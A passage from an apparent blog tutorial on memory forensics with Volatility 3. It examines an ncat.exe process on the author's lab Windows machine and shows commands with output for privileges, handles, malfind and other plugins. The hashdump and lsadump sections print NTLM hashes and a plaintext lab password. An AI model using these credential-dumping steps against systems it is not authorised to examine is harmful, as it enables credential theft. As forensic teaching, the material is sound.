<span style="color: white;">* 0xbb0688e7c920 FILE 105970 2 File Archive FILE_NAME 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 NCAT.EXE-1B3976EF.pf</span>
<span style="color: white;">* 0xbb0688e7d8b0 FILE 105974 2 File Archive FILE_NAME 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 NCATEX~2.PF</span>
<span style="color: white;">* 0xbb0688e7d920 FILE 105974 2 File Archive FILE_NAME 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 NCAT.EXE-4B4B887F.pf</span>
</pre></div>
</div><div><br />Looking at the environment variables for the<i> ncat.exe </i>process with <i>PID 4260</i><br /><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.envars.Envars --pid 4260</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Block Variable Value</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 LOCALAPPDATA C:\Users\SecurityNik\AppData\Local</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 OS Windows_NT</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 </span><span style="color: #fcff01;"><b>USERDOMAIN SECURITYNIK-WIN</b></span>
<span style="color: white;">4260 ncat.exe 0x14a4810 USERDOMAIN_ROAMINGPROFILE SECURITYNIK-WIN</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 </span><span style="color: #fcff01;"><b>USERNAME SecurityNik</b></span>
<span style="color: white;">4260 ncat.exe 0x14a4810 </span><span style="color: #fcff01;"><b>USERPROFILE C:\Users\SecurityNik</b></span>
<span style="color: white;">4260 ncat.exe 0x14a4810 user_aliases C:\Tools\Cmder\config\user_aliases.cmd</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 USER_BUILD windows.1</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 USER_MAJOR 2</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 USER_MINOR 34</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 USER_PATCH 1</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 VENDORED_BUILD windows.1</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 VENDORED_MAJOR 2</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 VENDORED_MINOR 29</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 VENDORED_PATCH 1</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 verbose_output 0</span>
<span style="color: white;">...</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
</div><p>Getting information on the user and the permission the <i>ncat.exe</i> process is running with.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.getsids.GetSIDs --pid 4260 </span></b><span style="color: white;"> </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process SID Name</span>
<span><span style="color: white;">4260 ncat.exe S-1-5-21-3036856633-148622980-1367235899-1001 </span><b><span style="color: #fcff01;">SecurityNik</span></b></span>
<span><span style="color: white;">4260 ncat.exe S-1-5-21-3036856633-148622980-1367235899-513 </span><b><span style="color: #fcff01;">Domain Users</span></b></span>
<span style="color: white;">4260 ncat.exe S-1-1-0 Everyone</span>
<span><span style="color: white;">4260 ncat.exe S-1-5-114 </span><b><span style="color: #fcff01;">Local Account (Member of Administrators)</span></b></span>
<span><span style="color: white;">4260 ncat.exe S-1-5-32-544 </span><b><span style="color: #fcff01;">Administrators</span></b></span>
<span style="color: white;">4260 ncat.exe S-1-5-32-545 Users</span>
<span style="color: white;">4260 ncat.exe S-1-5-4 Interactive</span>
<span style="color: white;">4260 ncat.exe S-1-2-1 Console Logon (Users who are logged onto the physical console)</span>
<span style="color: white;">4260 ncat.exe S-1-5-11 Authenticated Users</span>
<span style="color: white;">4260 ncat.exe S-1-5-15 This Organization</span>
<span style="color: white;">4260 ncat.exe S-1-5-113 Local Account</span>
<span style="color: white;">4260 ncat.exe S-1-5-5-0-184823 Logon Session</span>
<span style="color: white;">4260 ncat.exe S-1-2-0 Local (Users with the ability to log in locally)</span>
<span style="color: white;">4260 ncat.exe S-1-5-64-10 NTLM Authentication</span>
<span><span style="color: white;">4260 ncat.exe S-1-16-12288 </span><b><span style="color: #fcff01;">High Mandatory Level</span></b></span>
</pre></div>
</div><div><br /></div><div><div>Above, we see the the user is <i>SecurityNik </i>and is also a member of the local Administrators group. Additionally,<i> ncat.exe </i>is running with <i>High Mandatory Level.</i></div><div><br /></div><div>Taking a deeper look at the privileges.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.privileges.Privs --pid 4260</span></b><span style="color: white;"> </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Value Privilege Attributes Description</span>
<span style="color: white;">4260 ncat.exe 2 SeCreateTokenPrivilege Create a token object</span>
<span style="color: white;">4260 ncat.exe 3 SeAssignPrimaryTokenPrivilege Replace a process-level token</span>
<span style="color: white;">4260 ncat.exe 4 SeLockMemoryPrivilege Lock pages in memory</span>
<span style="color: white;">4260 ncat.exe 5 SeIncreaseQuotaPrivilege Present Increase quotas</span>
<span style="color: white;">4260 ncat.exe 6 SeMachineAccountPrivilege Add workstations to the domain</span>
<span style="color: white;">4260 ncat.exe 7 SeTcbPrivilege Act as part of the operating system</span>
<span style="color: white;">4260 ncat.exe 8 SeSecurityPrivilege Present Manage auditing and security log</span>
<span style="color: white;">4260 ncat.exe 9 SeTakeOwnershipPrivilege Present Take ownership of files/objects</span>
<span style="color: white;">4260 ncat.exe 10 SeLoadDriverPrivilege Present Load and unload device drivers</span>
<span style="color: white;">4260 ncat.exe 11 SeSystemProfilePrivilege Present Profile system performance</span>
<span style="color: white;">4260 ncat.exe 12 SeSystemtimePrivilege Present Change the system time</span>
<span style="color: white;">4260 ncat.exe 13 SeProfileSingleProcessPrivilege Present Profile a single process</span>
<span style="color: white;">4260 ncat.exe 14 SeIncreaseBasePriorityPrivilege Present Increase scheduling priority</span>
<span style="color: white;">4260 ncat.exe 15 SeCreatePagefilePrivilege Present Create a pagefile</span>
<span style="color: white;">4260 ncat.exe 16 SeCreatePermanentPrivilege Create permanent shared objects</span>
<span style="color: white;">4260 ncat.exe 17 SeBackupPrivilege Present Backup files and directories</span>
<span style="color: white;">4260 ncat.exe 18 SeRestorePrivilege Present Restore files and directories</span>
<span style="color: white;">4260 ncat.exe 19 SeShutdownPrivilege Present Shut down the system</span>
<span style="color: white;">4260 ncat.exe 20 SeDebugPrivilege Present Debug programs</span>
<span style="color: white;">4260 ncat.exe 21 SeAuditPrivilege Generate security audits</span>
<span style="color: white;">4260 ncat.exe 22 SeSystemEnvironmentPrivilege Present Edit firmware environment values</span>
<span style="color: white;">4260 ncat.exe 23 SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories</span>
<span style="color: white;">4260 ncat.exe 24 SeRemoteShutdownPrivilege Present Force shutdown from a remote system</span>
<span style="color: white;">4260 ncat.exe 25 SeUndockPrivilege Present Remove computer from docking station</span>
<span style="color: white;">4260 ncat.exe 26 SeSyncAgentPrivilege Synch directory service data</span>
<span style="color: white;">4260 ncat.exe 27 SeEnableDelegationPrivilege Enable user accounts to be trusted for delegation</span>
<span style="color: white;">4260 ncat.exe 28 SeManageVolumePrivilege Present Manage the files on a volume</span>
<span style="color: white;">4260 ncat.exe 29 SeImpersonatePrivilege Present,Enabled,Default Impersonate a client after authentication</span>
<span style="color: white;">4260 ncat.exe 30 SeCreateGlobalPrivilege Present,Enabled,Default Create global objects</span>
<span style="color: white;">4260 ncat.exe 31 SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller</span>
<span style="color: white;">4260 ncat.exe 32 SeRelabelPrivilege Modify the mandatory integrity level of an object</span>
<span style="color: white;">4260 ncat.exe 33 SeIncreaseWorkingSetPrivilege Present Allocate more memory for user applications</span>
<span style="color: white;">4260 ncat.exe 34 SeTimeZonePrivilege Present Adjust the time zone of the computer's internal clock</span>
<span style="color: white;">4260 ncat.exe 35 SeCreateSymbolicLinkPrivilege Present Required to create a symbolic link</span>
<span style="color: white;">4260 ncat.exe 36 SeDelegateSessionUserImpersonatePrivilege Present Obtain an impersonation token for another user in the same session.</span>
</pre></div>
</div><div><br /></div><div><div>Quite a lot of privileges. This helps to confirm above, that the process is running with high integrity.</div><div><br /></div><div>Looking at handles the <i>ncat.exe</i> process has opened.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.handles.Handles --pid 4260</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Offset HandleValue Type GrantedAccess Name</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0xd187c1e33d30 0x94 File 0x100020 \Device\HarddiskVolume2\Users\SecurityNik</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0xd187c13b76e0 0x1f8 Event 0x1f0003</span>
<span style="color: white;">4260 ncat.exe 0xd187c1e34690 0x1fc File 0x120089 \Device\NamedPipe\</span>
<span style="color: white;">4260 ncat.exe 0xd187c1e34500 0x204 File 0x120196 \Device\NamedPipe</span>
<span style="color: white;">4260 ncat.exe 0xd187c1e34820 0x208 File 0x120089 \Device\NamedPipe\ncat-0</span>
<span style="color: white;">4260 ncat.exe 0xd187c10dd400 0x210 Mutant 0x1f0001</span>
<span style="color: white;">4260 ncat.exe 0xd187c1bc6080 0x214 Process 0x1fffff ncat.exe Pid 4500</span>
<span style="color: white;">...</span>
<span style="color: white;">USER\S-1-5-21-3036856633-148622980-1367235899-1001\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION</span>
<span style="color: white;">4260 ncat.exe 0xd187c1f5ef60 0x228 Event 0x1f0003</span>
<span style="color: white;">4260 ncat.exe 0xd187c13b8de0 0x22c Event 0x1f0003</span>
</pre></div>
</div><div><br /></div><div><div>Let's now extract any credentials from the host, using <i>hashdump</i></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><span style="color: #fcff01;"><b>windows.hashdump.Hashdump</b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">User <span> </span><span> <span> </span></span>rid lmhash <span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span>nthash</span>
<span style="color: white;">Administrator <span> </span>500 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">Guest <span> </span><span> <span> </span></span>501 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">DefaultAccount <span> </span>503 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">WDAGUtilityAccount 504 aad3b435b51404eeaad3b435b51404ee c2622233208f902795d9ad5bde22b628</span>
<span><span style="color: white;">SecurityNik </span><span style="color: white;"> </span><span style="color: white;">1001 aad3b435b51404eeaad3b435b51404ee </span><b><span style="color: #fcff01;">23e1d10001876b0078a9a779017fc026</span></b></span>
</pre></div>
</div><div><br /></div><div><div><div>Looking for credentials in the<i> lsass.exe </i>process.</div><div><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.lsadump.Lsadump</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">Key <span> </span><span> <span> </span></span>Secret <span> </span><span> </span><span> </span><span> </span><span> <span> </span><span> </span><span> </span><span> </span><span> </span></span>Hex</span>
<span><span style="color: white;">DefaultPassword </span><span style="color: white;"> </span><span style="color: #fcff01;"><b>Testing1</b></span></span><span style="color: white;">%òvÌBhúmÃfTî <span> </span><span> </span><span> </span><span> </span><span> <span> </span></span>10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 00 65 00 73 00 74 00 69 00 6e 00 67 00 31 00 25 f2 1f 76 83 cc a0 08 42 68 fa 6d c3 66 54 ee</span>
<span style="color: white;">DPAPI_SYSTEM <span> </span>,ÀC³▒N#0t"íãܺÈÕÿs/É▒I[ÌÕؤqôUMn <span> <span> </span></span>2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 c0 43 b3 1a 05 9e 4e 23 30 74 22 9b e6 ed e3 dc ba c8 1d d5 ff 73 9c 2f c9 1a 49 0f 5b cc d5 d8 7f a4 94 71 f4 55 4d 6e 00 00 00 00</span>
<span style="color: white;">L$_RasConnectionCredentials#0 88[`Þ6Ù5N½Â§^)n</span><span style="color: #fcff01;"><b>Testing1</b></span><span style="color: white;"> <span> </span><span> <span> </span></span>38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 05 00 5b 60 de 36 d9 98 35 4e bd c2 a7 15 5e 81 29 6e 12 00 00 00 54 00 65 00 73 00 74 00 69 00 6e 00 67 00 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span>
<span style="color: white;">NL$KM @×çs¶o(ôÛQÙSGÔÀÙ²7e¿Â¡Û#jåh®X8'c`:Aݤ¨u¹▒7=ÁéqÆÿÿC}ºR5uù 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d7 e7 ad 73 b6 6f 28 f4 db 51 12 d9 53 47 86 d4 0f c0 d9 b2 37 65 bf 53 97 08 c2 a1 db 23 9f 6a e5 9d 68 ae 9c 9a 58 0e 38 27 63 60 05 06 3a 85 88 41 dd 1b 21 16 1b 75 8a a4 a8 75 b9 18 37 3d 16 c1 e9 10 71 c6 ff ff 43 7d ba 06 52 35 75 f9</span>
</pre></div>
</div><div><br /></div><div><br /></div><div>Looking to see what version information can be extracted.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.verinfo.VerInfo</span></b><span style="color: white;"> | more</span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2 PDB scanning finished </span>
<span style="color: white;">PID Process Base Name Major Minor Product Build</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0x730000 ncat.exe - - - -</span>
<span style="color: white;">4260 ncat.exe 0x7ffe2ab70000 ntdll.dll - - - -</span>
<span style="color: white;">4260 ncat.exe 0x7ffe2a810000 wow64.dll - - - -</span>
<span style="color: white;">4260 ncat.exe 0x7ffe29950000 wow64win.dll - - - -</span>
<span style="color: white;">4260 ncat.exe 0x771d0000 wow64cpu.dll - - - -</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Nothing interesting above.</div><div><br /></div><div>Taking a look at the Virtual Address Descriptor (VAD)</div></div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.vadinfo.VadInfo --pid 4260</span></b><span style="color: white;"> </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Offset Start VPN End VPN Tag Protection CommitCharge PrivateMemory Parent File File output</span>
<span style="color: white;">4260 ncat.exe 0xd187bfeeaad0 0x75c20000 0x75e33fff Vad PAGE_EXECUTE_WRITECOPY 28 0 0x0 \Windows\SysWOW64\KernelBase.dll Disabled</span>
<span style="color: white;">4260 ncat.exe 0xd187c1c83e40 0x14a0000 0x14affff VadS PAGE_READWRITE 11 1 0xffffd187bfeeaad0 N/A Disabled</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0xd187c1fac350 0x730000 0x8d0fff Vad PAGE_EXECUTE_WRITECOPY 18 0 0xffffd187bfeeac10 \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe Disabled</span>
<span style="color: white;">...</span>
<span style="color: white;"> 0xffffd187c01f7a60 \Windows\SysWOW64\pcapwsp.dll Disabled</span>
<span style="color: white;">4260 ncat.exe 0xd187c01f8050 0x3d40000 0x3e3ffff VadS PAGE_READWRITE 4 1 0xffffd187bceac5a0 N/A Disabled</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0xd187c1c7cc30 0x7ffe7000 0x7ffe7fff VadS PAGE_READONLY 1 1 0xffffd187c1fb03b0 N/A Disabled</span>
<span style="color: white;">4260 ncat.exe 0xd187c1c82e00 0x7f290000 0x7f291fff VadS PAGE_READWRITE 1 1 0xffffd187c1c7cc30 N/A Disabled</span>
<span style="color: white;">4260 ncat.exe 0xd187bfeedc30 0x7f150000 0x7f24ffff Vad PAGE_READONLY 0 0 0xffffd187c1c82e00 N/A Disabled</span>
<span style="color: white;">4260 ncat.exe 0xd187c158d7d0 0x7e110000 0x7e17afff Vad PAGE_EXECUTE_WRITECOPY 18 0 </span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0xd187c1faf730 0x7ffe2ab70000 0x7ffe2ad64fff Vad PAGE_EXECUTE_WRITECOPY 16 0 0xffffd187c10da7f0 \Windows\System32\ntdll.dll Disabled</span>
<span style="color: white;">.......</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Get information on existing services</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><span style="color: #fcff01;"><b>windows.svcscan.SvcScan</b></span><span style="color: white;"> | more </span>
<span style="color: white;">Volatility 3 Framework 2.0.2 PDB scanning finished </span>
<span style="color: white;">Offset Order PID Start State Type Name Display Binary</span>
<span style="color: white;">0x1887f463cf0 399 0 SERVICE_AUTO_START SERVICE_RUNNING SERVICE_WIN32_SHARE_PROCESS RpcEptMapper RPC Endpoint Mapper -</span>
<span style="color: white;">0x1887f463d00 398 N/A SERVICE_DEMAND_START SERVICE_STOPPED SERVICE_WIN32_OWN_PROCESS rpcapd rpcapd N/A</span>
<span style="color: white;">0x1887f463960 397 N/A SERVICE_DEMAND_START SERVICE_STOPPED SERVICE_WIN32_SHARE_PROCESS RmSvc RmSvc N/A</span>
<span style="color: white;">0x1887f463ed0 396 N/A SERVICE_DEMAND_START SERVICE_STOPPED SERVICE_KERNEL_DRIVER rhproxy rhproxy N/A</span>
<span style="color: white;">0x1887f468b10 395 N/A SERVICE_DEMAND_START SERVICE_STOPPED SERVICE_KERNEL_DRIVER RFCOMM RFCOMM N/A</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>... and additional information on the services</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.getservicesids.GetServiceSIDs</span></b><span style="color: white;"> | more </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2 PDB scanning finished </span>
<span style="color: white;">SID Service</span>
<span style="color: white;">S-1-5-80-4151353957-356578678-4163131872-800126167-2037860865 .NET CLR Networking 4.0.0.0</span>
<span style="color: white;">S-1-5-80-1135273183-3738781202-689480478-891280274-255333391 .NET Memory Cache 4.0</span>
<span style="color: white;">S-1-5-80-3459415445-2224257447-3423677131-2829651752-4257665947 3ware</span>
<span style="color: white;">S-1-5-80-2917441881-3404282297-3983348447-1829381237-2935805708 AarSvc</span>
<span style="color: white;">S-1-5-80-1925620318-959733373-4030606672-1109042073-4287256036 AarSvc_2ea6a</span>
<span style="color: white;">S-1-5-80-1975967573-2913356537-819030703-3730719923-1995772179 AcpiDev</span>
<span style="color: white;">S-1-5-80-2670625634-2386107419-4204951937-4094372046-2600379021 acpiex</span>
<span style="color: white;">S-1-5-80-3267050047-1503497915-401953950-2662906978-1179039408 acpipagr</span>
<span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div><div><div>Leveraging the <i>malfind</i> module to find any malware.</div></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.malfind.Malfind --pid 4260</span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Start VPN End VPN Tag Protection CommitCharge PrivateMemory File output Hexdump Disasm</span>
<span style="color: white;">4260 ncat.exe 0xf40000 0xf40fff VadS PAGE_EXECUTE_READWRITE|PAGE_NOCACHE 1 1 Disabled</span>
<span style="color: white;">68 90 4f 25 77 9c 60 68 h.O%w.`h</span>
<span style="color: white;">14 00 f4 00 e8 5f b7 e0 ....._..</span>
<span style="color: white;">74 61 9d c3 43 00 3a 00 ta..C.:.</span>
<span style="color: white;">5c 00 54 00 6f 00 6f 00 \.T.o.o.</span>
<span style="color: white;">6c 00 73 00 5c 00 43 00 l.s.\.C.</span>
<span style="color: white;">6d 00 64 00 65 00 72 00 m.d.e.r.</span>
<span style="color: white;">5c 00 76 00 65 00 6e 00 \.v.e.n.</span>
<span style="color: white;">64 00 6f 00 72 00 5c 00 d.o.r.\.</span>
<span style="color: white;">0xf40000: push 0x77254f90</span>
<span style="color: white;">0xf40005: pushfd</span>
<span style="color: white;">0xf40006: pushal</span>
<span style="color: white;">0xf40007: push 0xf40014</span>
<span style="color: white;">0xf4000c: call 0x75d4b770</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Testing to see if there is a Skeleton Key, below says "False"<br /><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.skeleton_key_check.Skeleton_Key_Check</span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Skeleton Key Found rc4HmacInitialize rc4HmacDecrypt</span>
<span style="color: white;">612 lsass.exe </span><span style="color: #fcff01;"><b>False </b></span><span style="color: white;">0x7ffe279d63c0 0x7ffe279d6800</span>
</pre></div>
</div><div><br /></div><p>Peeking into the <i>userassist</i>.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.registry.userassist.UserAssist</span></b><span style="color: white;"> | more </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2 PDB scanning finished </span>
<span style="color: white;">Hive Offset Hive Name Path Last Write Time Type Name ID Count Focus Count Time Focused Last Updated Raw D</span>
<span style="color: white;">ata</span>
<span style="color: white;">0xe50a50363000 hive0xe50a50363000 - - - - - - - - - -</span>
<span style="color: white;">0xe50a5048a000 hive0xe50a5048a000 - - - - - - - - - -</span>
<span style="color: white;">0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{9E04CAB2-CC</span>
<span style="color: white;">14-11DF-BB8C-A2F1DED72085}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A</span>
<span style="color: white;">0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{A3D53349-6E</span>
<span style="color: white;">61-4557-8FC7-0028EDCEEBF6}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A</span>
<span style="color: white;">0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{B267E3AD-A8</span>
<span style="color: white;">25-4A09-82B9-EEC22AA3B847}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A</span>
<span style="color: white;">0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{BCB48336-4D</span>
<span style="color: white;">DD-48FF-BB0B-D3190DACB3E2}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A</span>
<span style="color: white;">0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CAA59E3C-47</span>
<span style="color: white;">92-41A5-9909-6A6A8D32490E}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A</span>
